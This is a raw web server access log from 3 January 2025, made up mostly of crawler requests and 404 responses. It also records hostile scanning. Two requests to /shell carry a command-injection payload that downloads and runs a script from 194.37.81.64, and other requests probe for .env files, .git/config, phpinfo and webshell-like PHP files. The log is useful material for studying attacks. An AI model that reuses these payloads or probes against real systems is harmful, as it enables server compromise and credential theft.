156.59.198.135 - - [03/Jan/2025:01:00:34 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/cut.gif HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
154.213.187.122 - - [03/Jan/2025:01:01:46 +0100] "GET /login.rsp HTTP/1.1" 404 354 "-" "Hello World"
156.59.198.135 - - [03/Jan/2025:01:04:34 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/copy.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Jan/2025:01:08:34 +0100] "GET /docs/contadino/ANGEBOT/AG17-000005.pdf HTTP/1.0" 404 305 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
91.224.92.18 - - [03/Jan/2025:01:09:17 +0100] "GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\\/194.37.81.64/random.sh;chmod+777+random.sh;./random.sh HTTP/1.1" 404 280 "-" "KrebsOnSecurity"
156.59.198.135 - - [03/Jan/2025:01:12:34 +0100] "GET /renault.2web.at/stats/lang/awstats-is.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Jan/2025:01:16:34 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00004.pdf HTTP/1.0" 404 307 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Jan/2025:01:20:35 +0100] "GET /renault.2web.at/stats/lang/awstats-cn.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Jan/2025:01:24:34 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/saveas.gif HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.55.186 - - [03/Jan/2025:01:27:42 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [03/Jan/2025:01:28:35 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00006.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [03/Jan/2025:01:32:34 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/outdent.gif HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [03/Jan/2025:01:36:35 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/save.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Jan/2025:01:57:32 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/date.gif HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Jan/2025:02:23:16 +0100] "GET /renault.2web.at/stats/lang/awstats-th.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Jan/2025:02:27:16 +0100] "GET /renault.2web.at/stats/lang/awstats-jp.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Jan/2025:02:31:16 +0100] "GET /renault.2web.at/stats/lang/awstats-eu.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [03/Jan/2025:02:39:17 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/indent.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [03/Jan/2025:02:43:19 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/radio.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
91.224.92.18 - - [03/Jan/2025:02:47:02 +0100] "GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\\/194.37.81.64/random.sh;chmod+777+random.sh;./random.sh HTTP/1.1" 404 280 "-" "KrebsOnSecurity"
156.59.198.136 - - [03/Jan/2025:02:47:19 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/print.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
93.174.93.12 - - [03/Jan/2025:02:54:51 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/51.0.2704.79 Chrome/51.0.2704.79 Safari/537.36"
95.214.55.226 - - [03/Jan/2025:02:59:07 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.136 - - [03/Jan/2025:03:07:21 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202106070903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Jan/2025:03:11:21 +0100] "GET /renault.2web.at/stats/lang/awstats-es.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [03/Jan/2025:03:15:21 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202101200903_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
154.216.16.205 - - [03/Jan/2025:03:17:21 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
154.216.16.205 - - [03/Jan/2025:03:17:23 +0100] "POST / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
156.59.198.135 - - [03/Jan/2025:03:19:21 +0100] "GET /docs/contadino/2017/GS17-000004.pdf HTTP/1.0" 404 301 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.23.24 - - [03/Jan/2025:03:23:21 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
179.43.191.146 - - [03/Jan/2025:03:24:34 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
46.19.138.234 - - [03/Jan/2025:03:26:17 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
47.128.35.43 - - [03/Jan/2025:03:27:22 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.42.85 - - [03/Jan/2025:03:31:23 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.18.108 - - [03/Jan/2025:03:35:23 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
213.136.80.106 - - [03/Jan/2025:03:38:25 +0100] "CONNECT www.google.com:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1"
5.181.190.248 - - [03/Jan/2025:03:57:17 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
87.120.112.187 - - [03/Jan/2025:04:02:06 +0100] "GET /_profiler/phpinfo HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Linux; Android 8.1.0; SM-T580) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Safari/537.36"
205.210.31.108 - - [03/Jan/2025:04:03:29 +0100] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
156.59.198.135 - - [03/Jan/2025:04:05:46 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00016.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Jan/2025:04:09:46 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/rule.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [03/Jan/2025:04:13:47 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/image.gif HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
3.142.47.109 - - [03/Jan/2025:04:17:18 +0100] "\x16\x03\x01" 400 383 "-" "-"
3.142.47.109 - - [03/Jan/2025:04:17:26 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
156.59.198.135 - - [03/Jan/2025:04:17:48 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/div.gif HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.55.32 - - [03/Jan/2025:04:18:38 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
104.248.30.253 - - [03/Jan/2025:04:20:52 +0100] "\x16\x03\x01\x01$\x01" 400 383 "-" "-"
156.59.198.135 - - [03/Jan/2025:04:21:48 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00001.pdf HTTP/1.0" 404 307 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [03/Jan/2025:04:25:48 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/combobox.gif HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
80.82.68.17 - - [03/Jan/2025:04:29:34 +0100] "CONNECT api.ipify.org:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1"
156.59.198.135 - - [03/Jan/2025:04:29:48 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/pasteword.gif HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
199.45.154.137 - - [03/Jan/2025:04:30:46 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
199.45.154.137 - - [03/Jan/2025:04:30:50 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.137 - - [03/Jan/2025:04:30:50 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.137 - - [03/Jan/2025:04:30:51 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.137 - - [03/Jan/2025:04:30:51 +0100] "PRI * HTTP/2.0" 400 383 "-" "-"
156.59.198.136 - - [03/Jan/2025:04:33:49 +0100] "GET /docs/contadino/2017/GS17-000003.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Jan/2025:04:37:50 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/time.gif HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [03/Jan/2025:04:41:52 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/superscript.gif HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
110.77.164.145 - - [03/Jan/2025:04:52:25 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
185.242.226.116 - - [03/Jan/2025:04:59:07 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
156.59.198.136 - - [03/Jan/2025:05:05:54 +0100] "GET /renault.2web.at/stats/lang/awstats-hu.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
154.213.187.122 - - [03/Jan/2025:05:06:21 +0100] "GET /login.rsp HTTP/1.1" 404 354 "-" "Hello World"
156.59.198.136 - - [03/Jan/2025:05:09:55 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202111291603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.215.236.132 - - [03/Jan/2025:05:15:21 +0100] "GET /.git/config HTTP/1.1" 404 285 "-" "EmailWolf 1.00"
185.242.226.116 - - [03/Jan/2025:05:15:53 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "python-requests/2.26.0"
185.242.226.116 - - [03/Jan/2025:05:15:53 +0100] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.26.0"
87.120.115.34 - - [03/Jan/2025:05:19:47 +0100] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0"
87.120.115.34 - - [03/Jan/2025:05:20:26 +0100] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
87.120.115.119 - - [03/Jan/2025:05:22:44 +0100] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/71.0.3578.89 Mobile/15E148 Safari/605.1"
156.59.198.136 - - [03/Jan/2025:05:48:27 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/paste.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Jan/2025:05:52:28 +0100] "GET /renault.2web.at/stats/lang/awstats-de.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
167.94.145.106 - - [03/Jan/2025:05:53:26 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
167.94.145.106 - - [03/Jan/2025:05:53:29 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.106 - - [03/Jan/2025:05:53:29 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.106 - - [03/Jan/2025:05:53:29 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.106 - - [03/Jan/2025:05:53:30 +0100] "PRI * HTTP/2.0" 400 383 "-" "-"
156.59.198.136 - - [03/Jan/2025:05:56:28 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202101071403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.53.198 - - [03/Jan/2025:06:00:27 +0100] "GET /login.asp HTTP/1.1" 404 284 "-" "Linux Gnu (cow)"
156.59.198.135 - - [03/Jan/2025:06:00:28 +0100] "GET /ed-test.activities.at/stats/lang/awstats-hr.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Jan/2025:06:06:51 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00013.pdf HTTP/1.0" 404 309 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.98.11.155 - - [03/Jan/2025:06:13:14 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.136 - - [03/Jan/2025:06:13:39 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image127.jpg HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Jan/2025:06:17:40 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00003.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
147.45.112.222 - - [03/Jan/2025:06:39:25 +0100] "\x03" 400 383 "-" "-"
156.59.198.135 - - [03/Jan/2025:06:41:01 +0100] "GET /renault.2web.at/stats/lang/awstats-id.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Jan/2025:07:01:57 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/config/toolbar%20quick%20mode.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Jan/2025:07:05:57 +0100] "GET /ed-test.activities.at/stats/lang/awstats-ro.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
87.120.120.18 - - [03/Jan/2025:07:09:18 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3880.0 Safari/537.36"
156.59.198.135 - - [03/Jan/2025:07:09:58 +0100] "GET /docs/contadino/2017/GS17-000005.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [03/Jan/2025:07:13:59 +0100] "GET /renault.2web.at/stats/lang/awstats-dk.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
87.120.120.18 - - [03/Jan/2025:07:14:52 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
156.59.198.135 - - [03/Jan/2025:07:17:59 +0100] "GET /renault.2web.at/stats/lang/awstats-ca.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [03/Jan/2025:07:21:59 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/checkbox.gif HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [03/Jan/2025:07:25:59 +0100] "GET /docs/contadino/CIT/RE18-00001.pdf HTTP/1.0" 404 300 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.98.11.155 - - [03/Jan/2025:07:26:09 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
5.181.190.248 - - [03/Jan/2025:07:39:47 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [03/Jan/2025:07:40:45 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202106080903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Jan/2025:07:44:46 +0100] "GET /docs/contadino/2018/AUFTRAG/AB18-00006.pdf HTTP/1.0" 404 307 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
204.10.194.48 - - [03/Jan/2025:07:50:39 +0100] "GET /admin.php HTTP/1.1" 404 297 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
204.10.194.48 - - [03/Jan/2025:07:50:48 +0100] "GET /mah.php HTTP/1.1" 404 296 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
204.10.194.48 - - [03/Jan/2025:07:50:53 +0100] "GET /simple.php HTTP/1.1" 404 298 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
204.10.194.48 - - [03/Jan/2025:07:50:55 +0100] "GET /chosen.php HTTP/1.1" 404 298 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
64.62.156.45 - - [03/Jan/2025:08:08:40 +0100] "\x16\x03\x01" 400 383 "-" "-"
80.82.77.202 - - [03/Jan/2025:08:20:37 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3889.0 Safari/537.36"
156.59.198.136 - - [03/Jan/2025:08:39:36 +0100] "GET /docs/contadino/ANGEBOT/AG17-000004.pdf HTTP/1.0" 404 305 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [03/Jan/2025:08:56:27 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202011041103_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
5.181.190.248 - - [03/Jan/2025:09:05:31 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
104.155.20.93 - - [03/Jan/2025:09:11:48 +0100] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.32.3"
156.59.198.135 - - [03/Jan/2025:09:21:58 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201912131703_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [03/Jan/2025:09:25:58 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00020.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
179.43.191.146 - - [03/Jan/2025:09:29:29 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [03/Jan/2025:09:29:58 +0100] "GET /renault.2web.at/stats/lang/awstats-et.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
